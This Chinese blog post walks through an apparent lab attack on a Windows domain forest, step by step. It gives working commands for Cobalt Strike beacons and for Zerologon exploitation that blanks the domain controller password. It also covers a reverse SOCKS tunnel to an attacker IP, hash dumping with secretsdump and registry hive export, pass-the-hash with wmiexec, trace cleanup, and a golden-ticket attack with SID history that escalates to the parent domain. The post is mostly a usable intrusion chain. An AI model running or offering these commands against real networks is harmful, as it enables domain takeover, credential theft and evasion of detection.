欢迎光临
我们一直在努力

内网渗透:域森林实战

作者 小苏

模拟内网实战,以钓鱼已进入内网开始

cs生成exe上线web服务器

设置beacon响应时间为0

第一步:提权
利用ms14-058进行提权

提权成功

进行arp协议信息收集

作用:查看是否有多网卡

指令:

shell arp -a

查看主机信息

作用:可以看到有域,查看补丁进行对应的提权

指令:

shell systeminfo

收集网络全部信息

作用:可以看到主机名,域信息

指令:

shell ipconfig /all

利用nbtscan扫描

作用:扫出真实内网ip进行下一步渗透

进行mimikatz上传

作用:方便进一步内网渗透

扫描是否存在cve2020-1472

回应存在

指令:

lsadump::zerologon  /target:域控IP  /account:域控主机名$
shell mimikatz \”lsadump::zerologon /target:10.10.3.6  /account:ziyu$\” \”exit\”

上传ew进行代理

指令:

ew_for_Win.exe  -s rcsocks -l 1080 -e 888//将映射出的888端口返回到本地的1080端口

反向碰撞

原理:

我们攻击机开启了代理准备,也就是我们把888端口放到门口,谁指定我们的ip加这个端口碰撞便进行了代理连接

指令:

shell ew_for_Win.exe  -s rssocks -d 192.168.58.1(攻击机ip) -e 888

利用cve2020将域控密码置空

指令:

lsadump::zerologon  /target:域控IP  /account:域控主机名$  /exploit
shell mimikatz “lsadump::zerologon  /target:10.10.3.6  /account:ziyu$  /exploit” “exit”

kali设置代理,这里就是对应之前的代理设置,我们将888放到门口被撞,1080则为我们自己用

获取散列值

作用:制作票据,破解md5等等都可以,个人比较喜欢黄金票据

指令:

proxychains impacket-secretsdump -no-pass -just-dc xiyou.dayu.com/ZIYU\\$@10.10.3.6

利用wmiexec连接

作用:连接域控制器了

指令:

proxychains python3 wmiexec.py -hashes :e35c2b2d95f6ae63b75dbbff5195accb ./Administrator@10.10.3.6

将sam system security.save文件先导出后下载下来,并清理痕迹

指令:

reg save HKLM\\SYSTEM system.save
reg save HKLM\\SAM sam.save
reg save HKLM\\SECURITY security.save
get system.save

获取散列值
作用:获得各用户hash以及还原域防止出现问题
指令:
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAl

进行还原
指令:
proxychains python3 reinstall_original_pw.py ZIYU 10.10.3.6 75df0c2187b6a79e46f26fa2fb16573aL

这个时候再用之前获取到的管理员hash登录域控

指令:

proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accb xiyou.dayu.com/dayu@10.10.3.6

查看网卡信息,是否进攻正确

上线cs做中转,生成exe进行上线

kali直接上传上线

进行信息收集,这里21段机子未开

上传mimikatz利用信任关系制作票据进行攻击

先获取父子域sid

指令:

shell mimikatz “privilege::debug” “lsadump::lsa /patch /user:dayu$” “lsadump::trust /patch” “exit”

子域:S-1-5-21-4076297317-3311262154-314974380

父域:S-1-5-21-3309395417-4108617856-2168433834-519

krbtgt哈希值:c696e9337845d8ada46612d047e40209

进行黄金票据攻击

显示成功

指令:

shell “kerberos::golden /user:administrator /domain:xiyou.dayu.com /sid:S-1-5-21-4076297317-3311262154-314974380 /sids:S-1-5-21-3309395417-4108617856-2168433834-519 /krbtgt:c696e9337845d8ada46612d047e40209  /ptt” “exit”

但是这里是失败了

创建域管理员账号

直接通过3389进行黄金票据

终于也是成功了

接着利用wmiexec进行父域的访问

指令:

wmiexec.exe administrator:QWEasd123@10.10.3.5

上传2.exe进行运行上线cs

这一套直线内网流程就结束收工了

赞(0) 打赏
未经允许不得转载:黑客技术网 » 内网渗透:域森林实战
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏